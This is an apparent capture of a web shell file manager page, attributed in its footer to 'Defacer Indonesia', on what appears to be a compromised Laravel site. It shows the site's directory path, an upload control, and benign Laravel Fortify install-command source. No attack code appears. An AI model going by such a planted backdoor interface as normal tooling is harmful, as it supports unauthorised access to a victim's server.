whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
laravel
/
fortify
/
src
/
Console
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/laravel/fortify/src/Console/InstallCommand.php
<?php namespace Laravel\Fortify\Console; use Illuminate\Console\Command; use Illuminate\Support\ServiceProvider; use Laravel\Fortify\FortifyServiceProvider; use Symfony\Component\Console\Attribute\AsCommand; #[AsCommand(name: 'fortify:install')] class InstallCommand extends Command { /** * The name and signature of the console command. * * @var string */ protected $signature = 'fortify:install'; /** * The console command description. * * @var string */ protected $description = 'Install all of the Fortify resources'; /** * Execute the console command. * * @return void */ public function handle() { $this->callSilent('vendor:publish', [ '--provider' => FortifyServiceProvider::class, ]); $this->registerFortifyServiceProvider(); $this->components->info('Fortify scaffolding installed successfully.'); } /** * Register the Fortify service provider in the application configuration file. */ protected function registerFortifyServiceProvider(): void { if (! method_exists(ServiceProvider::class, 'addProviderToBootstrapFile')) { return; } ServiceProvider::addProviderToBootstrapFile(\App\Providers\FortifyServiceProvider::class); } }
Copyright ©2021 || Defacer Indonesia